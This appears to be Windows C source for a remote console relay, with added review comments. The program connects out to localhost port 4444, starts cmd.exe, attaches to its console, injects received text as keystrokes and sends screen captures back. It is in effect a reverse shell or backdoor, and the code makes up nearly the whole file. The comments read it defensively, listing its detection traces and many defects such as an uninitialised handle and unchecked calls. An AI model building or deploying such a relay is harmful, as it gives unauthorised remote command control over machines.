- Create by compaq
- #pragma comment(lib, "ws2_32.lib")
- #define _WIN32_WINNT 0x0501
- #include <winsock2.h>
- #include <windows.h>
- #include <tchar.h>
- #include <stdio.h>
- #include <ws2tcpip.h>
- #include <ShellAPI.h>
- #include <tlhelp32.h>
/*
 * WinMain: remote console relay. As written, the function
 *   1. opens a TCP connection to the hard-coded endpoint "localhost":"4444",
 *   2. starts cmd.exe from C:\windows\system32 via ShellExecuteEx (SW_SHOW),
 *   3. walks a Toolhelp process snapshot and attaches to the console of the
 *      first entry that passes the name check,
 *   4. loops: receives up to 100 bytes, writes them to that console's input
 *      as key events followed by Enter, waits 3 s, then sends 6480 characters
 *      of console screen text back over the socket,
 *   5. leaves the loop when the received data starts with "exit".
 *
 * Parameters: hInstance, hPrev, lpCmdLine and nCmdShow are never read.
 * Returns: 0 after "exit"; the loop has no other exit path.
 *
 * Review notes (defensive reading):
 *   - The channel is plain TCP with no authentication, no encryption and no
 *     message framing, so whoever holds the other end of the socket drives
 *     the console and the traffic is readable on the wire.
 *   - No API return value is checked, and the function contains no
 *     closesocket, WSACleanup, CloseHandle or freeaddrinfo call.
 *   - Behaviour visible to host telemetry: this process starting cmd.exe, an
 *     outbound TCP connection to port 4444, OpenProcess(PROCESS_ALL_ACCESS)
 *     against each snapshot entry, and AttachConsole to another process.
 */
- int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrev, LPSTR lpCmdLine, int nCmdShow)
- {
// Locals. Several of these (sockAddr, sServer, the SMALL_RECT/COORD helpers,
// done, me32, bot/bot1, ...) are declared but never referenced below.
- WSADATA wsaData;
- struct sockaddr_in sockAddr;
- SOCKET sServer;
- int sockAddrLen;
- unsigned int i,j;  // j is only assigned when a NUL byte is found in the received data
- SOCKET sClient;
- SHELLEXECUTEINFO exeInfo;
- HANDLE hStdout,hStdin,old, hNewScreenBuffer;  // `old` is never assigned, yet it is used at label pl
- SMALL_RECT srctReadRect;
- SMALL_RECT srctWriteRect;
- TCHAR temp[10000];  // console text scratch buffer
- COORD coordBufSize;
- COORD coordBufCoord;
- COORD pos = {0,0};
- COORD pos1;
- CHAR_INFO done[160];
- SMALL_RECT srctWindow;
- struct addrinfo *result, hints;
- unsigned char url[100] = {"localhost"},port[10] = {"4444"};  // unused: getaddrinfo below gets literals
- char temp1[10000];  // socket receive buffer, later reused as the send buffer
- unsigned char temp2[200];  // unsigned copy of the first 100 received bytes
- TCHAR file[50] = {TEXT("C:\\windows\\system32\\cmd.exe")};  // unused: exeInfo.lpFile gets a literal
- CONSOLE_SCREEN_BUFFER_INFO csbiInfo;
- DWORD bot,bot1;
- DWORD dwTmp;
- INPUT_RECORD ir[200];  // not zeroed; only the fields assigned in the loop are defined
- DWORD len;
- HANDLE hModuleSnap = INVALID_HANDLE_VALUE;
- MODULEENTRY32 me32;
- HANDLE hProcessSnap;
- HANDLE hProcess;
- PROCESSENTRY32 pe32;
- WSAStartup(MAKEWORD(2,2), &wsaData);  // requests Winsock 2.2; result ignored
- ZeroMemory(&hints, sizeof (hints));
- hints.ai_family = AF_INET;
- hints.ai_socktype = SOCK_STREAM;
- hints.ai_protocol = IPPROTO_TCP;
- hints.ai_flags = AI_PASSIVE;  // passive flag is set, but no bind/listen follows; the socket is used with connect()
- // Resolve the hard-coded peer ("localhost", port "4444") that this program connects to
- getaddrinfo("localhost","4444", &hints, &result);  // result is dereferenced below without a failure check
- sClient = socket(result->ai_family, result->ai_socktype, result->ai_protocol);
- connect(sClient,result->ai_addr, (int)result->ai_addrlen);  // outbound connection; failure is not detected
// Launch a visible command interpreter. exeInfo is not zeroed first; only the
// fields listed here are set, and fMask = 0 requests no process handle back.
- exeInfo.cbSize = sizeof(exeInfo);
- exeInfo.fMask = 0;
- exeInfo.hwnd = 0;
- exeInfo.lpVerb = 0;
- exeInfo.lpFile = TEXT("C:\\windows\\system32\\cmd.exe");
- exeInfo.lpParameters = 0;
- exeInfo.lpDirectory = 0;
- exeInfo.nShow = SW_SHOW;
- exeInfo.hInstApp = 0;
- ShellExecuteEx(&exeInfo);
// Find a process to attach to by scanning every running process. Nothing ties
// the chosen entry to the cmd.exe started above: the first snapshot entry
// that passes the check is used.
- hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
- pe32.dwSize = sizeof( PROCESSENTRY32 );
- Process32First( hProcessSnap, &pe32 );
- do {
- hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID );  // full-access handle per entry; never used or closed
- memcpy(temp,pe32.szExeFile,20);  // first 20 bytes of the executable name
// Compares elements 0, 2, 4 and 6 of temp (TCHAR units) with 'c','m','d','.'.
// NOTE(review): whether this lines up with the name "cmd.exe" depends on the
// character width of TCHAR and szExeFile in the build - confirm.
- if(temp[0] == 'c' && temp[2] == 'm' && temp[4] == 'd' && temp[6] == '.') goto outer;
- } while( Process32Next( hProcessSnap, &pe32 ) );
// Reached on a match, and also by fall-through when no entry matched; in the
// latter case pe32 holds whatever the last enumeration call left in it.
- outer:
- AttachConsole(pe32.th32ProcessID);  // join the selected process's console
- hStdin = GetStdHandle(STD_INPUT_HANDLE);
- hStdout = GetStdHandle(STD_OUTPUT_HANDLE);
- GetConsoleScreenBufferInfo(hStdout,&csbiInfo);
- pos.X = 0;
- pos.Y = csbiInfo.srWindow.Bottom-80;  // 80 rows above the window's bottom row; negative when Bottom < 80 (unchecked)
// 6480 = 81 * 80, presumably 81 rows of an 80-column buffer - TODO confirm.
// This first read is overwritten by the read inside the loop before any send.
- ReadConsoleOutputCharacter(hStdout,temp,6480,pos,&len);
// Relay loop: one received chunk in, one screen capture out, every 3 seconds.
- for(;;) {
- memset(temp1,0x00,sizeof(temp1));
- memset(temp2,0x00,sizeof(temp2));
- recv(sClient,temp1,100,0);  // return value ignored: a closed or failed socket leaves the zeroed buffer in place
- for(i=0;i<100;i++) {
- temp2[i] = temp1[i];
- }
- if(temp2[0] == 'e' && temp2[1] == 'x' && temp2[2] == 'i' && temp2[3] == 't') goto pl;  // prefix match on "exit" ends the session
// Convert each received byte, up to the first NUL, into a key-down event.
// Only the five fields below are set; virtual key and scan code fields keep
// whatever the uninitialised ir[] held, and no key-up events are generated.
- for(i=0;i<100;i++) {
- if(temp2[i] == 0x00) {
- j=i;
- goto next;
- }
- ir[i].EventType = KEY_EVENT;
- ir[i].Event.KeyEvent.bKeyDown = TRUE;
- ir[i].Event.KeyEvent.dwControlKeyState = 0;
- ir[i].Event.KeyEvent.uChar.UnicodeChar = temp2[i];
- ir[i].Event.KeyEvent.wRepeatCount = 1;
- }
// If all 100 bytes are non-zero the loop above ends with i == 100 and j is
// not assigned in this pass (stale from an earlier pass, or uninitialised).
- next:
- ir[i].EventType = KEY_EVENT;
- ir[i].Event.KeyEvent.bKeyDown = TRUE;
- ir[i].Event.KeyEvent.dwControlKeyState = 0;
- ir[i].Event.KeyEvent.uChar.UnicodeChar = VK_RETURN;  // appends Enter after the received text
- ir[i].Event.KeyEvent.wRepeatCount = 1;
- dwTmp = 0;
- WriteConsoleInput(hStdin, ir, j+1, &dwTmp);  // injects j+1 events into the attached console's input queue
- Sleep(3000);  // fixed 3 s wait before the screen is captured
- GetConsoleScreenBufferInfo(hStdout,&csbiInfo);
- pos.X = 0;
- pos.Y = csbiInfo.srWindow.Bottom-80;
- ReadConsoleOutputCharacter(hStdout,temp,6480,pos,&len);  // len (characters actually read) is not consulted afterwards
- for(i=0;i<6480;i++) {
- temp1[i] = temp[i];  // narrows each TCHAR to char; lossy if TCHAR is wide
- }
- send(sClient,temp1,6480,0);  // always sends 6480 bytes in the clear; result ignored
- }
- pl:
- SetConsoleActiveScreenBuffer(old);  // `old` was never assigned: this passes an indeterminate handle
- return 0;
- }